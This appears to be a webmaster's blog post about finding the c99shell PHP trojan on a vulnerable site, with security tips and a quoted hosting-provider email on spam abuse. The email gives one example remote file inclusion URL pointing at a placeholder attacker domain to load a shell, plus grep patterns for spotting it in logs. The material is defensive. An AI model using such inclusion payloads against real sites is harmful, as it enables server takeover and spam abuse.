Recently I had a problem with general server performance issues.

To my surprise I found the c99shell php trojan on one of my sites.

http://www.sophos.com/security/analyses/phpc99shella.html

Basically I had an old image hosting script on domain within my server which was of course was vulnerable and resulted in access to writable folders and in the end my server being abused.

The good thing was that I have a VPS that I am mostly responsible for myself, so I had time to explore and locate the issue.

However, it is always a time pressing issue when your site is vulnerable as your data could be compromised, your IP's could be banned for mass mailing (spam) or your sites could even be defaced or deleted.

If you are on a shared hosting plan you will probably get a warning from your host as they monitor and locate the malicious behaviour from your account,,,, and you will need to fix the issue before they lock your account. Once that happens you can typically restore things but you might have to prove to them that your webspace is clean and ready to abide by their TOS of course.

I'll leave you with this email (below) which is from a host provider to a customer regarding malicious activity from an account.

Remember to audit all of your scripts /webspace code regularly for security problems. Always run the latest version of any given script and keep close to support forums for those scripts to be aware of happenings. It is also a good idea to delete any old script installs. Password protect any test/development installations and also be sure not to rename config files such as config.php to config.old or config.txt that actually contain passwords because Google code or other indexes might pick it up and display to all.

========================================

Dear Customer,

Unfortunately we received a large number of complaints concerning Spam-Mails

sent through your Webspace.

We have to bring to your attention that this kind of mass mailing is illegal

and can be prosecuted.

To help you get an general idea of the situation we divided this E-Mail into

two thematical sections.

In case you personally send large amounts of E-Mails, especially newsletters,

please continue reading on section one.

If you suspect that your Webspace has been compromised, especially through a

script, by a third party and abused to send Spam-Mails, please continue reading

on section two.

*******************************************************************************

1. E-Mail/Newsletter send by yourself?

*******************************************************************************

If you arrange the sending of the concerning mails by yourself, please note

that you have to use a so called "confirmed opt-in" sytem for your newsletter

subscriptions to ensure that E-Mails are only sent out to recipents who

explicitly agreed to receive them.

When using confirmed opt-in the subscription process looks something like this:

* Somebody asks for an address to be added to the list of recipients

* The system sends an E-Mail to that address with a verification link or code

* Only when that (unique) link is clicked or the code mailed back the address

is allowed to be added into the database

You can find further information for example at:

http://en.wikipedia.org/wiki/Opt_in_e-mail

In case of complaints you can prove, by the verification you received, that the

recipient explicitly agreed to be on your list.

*******************************************************************************

2. Webspace compromised by a third party?

*******************************************************************************

Quite often the Webspace gets compromised via insecure PHP-Scripts.

Insecure PHP Scripts with security holes like Cross-site-scripting

(http://en.wikipedia.org/wiki/Cross_site_scripting) make it possible to

include for example Mass-Mailing-Scripts and execute them on your Webspace.

It is very helpful to analyze the Apache log files to detect such attacks.

The attacks are looking mostly like the following *example*:

http://www.mydomain.com/index.php?page=http://www.attackerdomain.ru/c99.txt?

Searching the log files with the pattern "=http" would be the first step:

'grep "=http" access.log | less' for the actual log file

and

'zgrep "=http" access.log.* | less' for the older log files

If you detect such entries, we would recommend that you analyze and modify

the concerning script to prevent further abuse.

In case of a third party script (for example mambo) check the relevant

homepage for security updates and patches.

Furthermore we recommend you to check all your third party scripts for

security patches or updates.

In addition a complete search of your Webspace for unknown foreign scripts

makes sense.

If you need more information in this case you can request a sample

SPAM E-mail, which was sent via your Webspace, from us.

If the SPAM problem persists we recommend a complete deletion of all your files

on your space and a recovery of your data with a clean backup.

We hereby ask you to take the corresponding steps required to secure your

Webspace and to prevent the delivery of unwanted, unsolicited bulk e-mail.

Should further complaints reach us, we'll feel impelled to take

corresponding steps according to our T&C which results in in a temporarily lock.

Thank you for your understanding.

If you got further questions, feel free to contact us.

Kind Regards.

========================================